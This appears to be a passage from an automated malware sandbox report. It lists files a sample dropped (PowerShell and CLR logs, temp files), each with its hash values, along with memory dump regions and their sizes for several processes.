  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe.log
    Filesize

    1KB

    MD5

    8ec831f3e3a3f77e4a7b9cd32b48384c

    SHA1

    d83f09fd87c5bd86e045873c231c14836e76a05c

    SHA256

    7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

    SHA512

    26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    96109f157bcb9723f664ba90b9e3e10c

    SHA1

    2ece16a983cc356f2d57c7379de669e6283d5e0b

    SHA256

    f831e35e888c4d44d81cc6d7ad3e05a1dc0bd4aa0472a2fdf3752f0ef1cb4703

    SHA512

    a4da55d2e3f0af7f0db198816e969c13cee4b25e26ab683ef2dc0b2c024575c847ea3776bdbd50e6cd9a44d007636f8e0b2647691dc9f34e24dad054f17a5d57

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yxiggxsw.vty.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpC9B8.tmp
    Filesize

    1KB

    MD5

    850b89ac068ae6b302412f5c97e42bf6

    SHA1

    80db1b578078b31d1d256fef22017a1ac1faeaec

    SHA256

    f682e13f403c22eea060efeaa16b8be21e7275fc4ab2047264929df6a6c984b8

    SHA512

    367a2679e4219cb2b8ecf35a62525e78a1f374040d61506a602944d5d209310e1df9616c788a53c06881e274438f863ed5778938c9ddb871363e11a99021fbe5

    Download Submit

  • memory/2256-50-0x0000000006E80000-0x0000000006ECC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2256-16-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2256-44-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2256-66-0x0000000075180000-0x00000000751CC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2256-19-0x0000000005930000-0x0000000005952000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2256-89-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2256-15-0x0000000005340000-0x0000000005376000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2256-49-0x00000000068F0000-0x000000000690E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2256-17-0x0000000005AF0000-0x0000000006118000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2256-18-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2256-81-0x0000000007F60000-0x0000000007F7A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2256-80-0x0000000007E60000-0x0000000007E74000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2256-21-0x00000000062D0000-0x0000000006336000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2256-78-0x0000000007E20000-0x0000000007E31000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2256-33-0x0000000006340000-0x0000000006694000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2256-20-0x00000000059D0000-0x0000000005A36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3744-8-0x000000007490E000-0x000000007490F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3744-10-0x0000000006B20000-0x0000000006B88000-memory.dmp

    Filesize

    416KB

    Download

  • memory/3744-9-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3744-0-0x000000007490E000-0x000000007490F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3744-7-0x00000000051E0000-0x00000000051F2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3744-48-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3744-6-0x0000000005000000-0x000000000509C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3744-5-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3744-4-0x0000000004F40000-0x0000000004F4A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3744-3-0x0000000004D80000-0x0000000004E12000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3744-2-0x0000000005230000-0x00000000057D4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3744-1-0x0000000000320000-0x00000000003A6000-memory.dmp

    Filesize

    536KB

    Download

  • memory/4984-47-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4984-62-0x0000000006980000-0x000000000699E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4984-64-0x0000000007CE0000-0x000000000835A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4984-76-0x0000000007700000-0x000000000770A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4984-77-0x0000000007910000-0x00000000079A6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4984-63-0x0000000007360000-0x0000000007403000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4984-79-0x00000000078C0000-0x00000000078CE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4984-65-0x0000000007690000-0x00000000076AA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4984-52-0x0000000075180000-0x00000000751CC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4984-82-0x00000000079B0000-0x00000000079B8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4984-51-0x0000000006940000-0x0000000006972000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4984-27-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4984-88-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4984-43-0x0000000074900000-0x00000000750B0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/5088-45-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.